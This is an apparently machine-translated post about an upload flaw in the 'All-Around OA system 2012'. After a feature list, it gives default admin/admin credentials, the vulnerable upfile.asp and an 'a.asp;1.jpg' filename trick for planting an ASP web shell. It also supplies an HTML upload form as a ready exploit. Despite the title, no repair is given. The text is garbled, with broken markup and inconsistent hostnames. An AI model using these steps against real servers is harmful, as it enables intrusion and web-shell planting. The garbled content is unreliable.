All-Around OA system upload defects and repair

Software introduction:
The all-around OA system 2012 is a very powerful OA system. Currently, its functions have been fully functional to meet daily office requirements.
 
Main functions:
Company announcement
Work Plan
Communication Assistant
Customer resources
My Documents
Document Circulation
Public resources
Resource Reservation
Attendance today
Personal plan
Personal Address Book
Basic personal archive
Unread emails
Send email
Receiving folder
Sender folder
Network Hard Disk
Network Conference
Network Survey
Exchange Forum
 
Management Username: admin management password: admin
 
Source code download: http://www.mycodes.net/30/4750.htm
Vulnerability files:

Upfile. asp typical online Upload Vulnerability
Exploitation:

Submit: http://www.bkjia.com/upfile. asp
 
 
If upfile. asp does not exist. You can try the following method. Upload a.asp;1.jpg
Shell in http://www.2cto.com/upfile/savepath/a.asp%1.jpg
Prerequisite: resolution Vulnerability

EXP:
<Table border = '0' align = "center" cellpadding = "5">
<Form method = "POST" action = "http://www.bkjia.com/oa/upfile. asp "enctype =" multipart/form-data "id =" form1 "name =" form1 "onsubmit = 'Return checkSub (this) '>
<Tr>
<Td> error: </td>
<Td> <input type = 'Radio 'name = 'errnumber' value = '0'>
Automatic Rename
<Input type = 'Radio 'name = 'errnumber' value = '1' checked>
Error Reporting Method
<Input type = 'Radio 'name = 'errnumber' value = '2'>
Direct coverage </td>
</Tr>
<Tr>
<Td> topic: </td>
<Td> <input type = 'text' name = 'filename' size = '30'> </td>
</Tr>
<Tr>
<Td> file: </td>
<Td> <input type = "file" name = "fruit" size = "30"> </td>
</Tr>
<Tr>
<Td valign = 'top'> Introduction: </td>
<Td> <textarea name = 'fileext 'cols = '40' rows = '5'> </textarea> </td>
</Tr>
 
<Td colspan = '2'> <input type = "submit" value = "Upload File" name = "subbutt"> </td>
</Tr>
</Form>
 
 
 
Www.2cto.com:
The online upload vulnerability is very old.

By Mr. DzY from www.0855. TV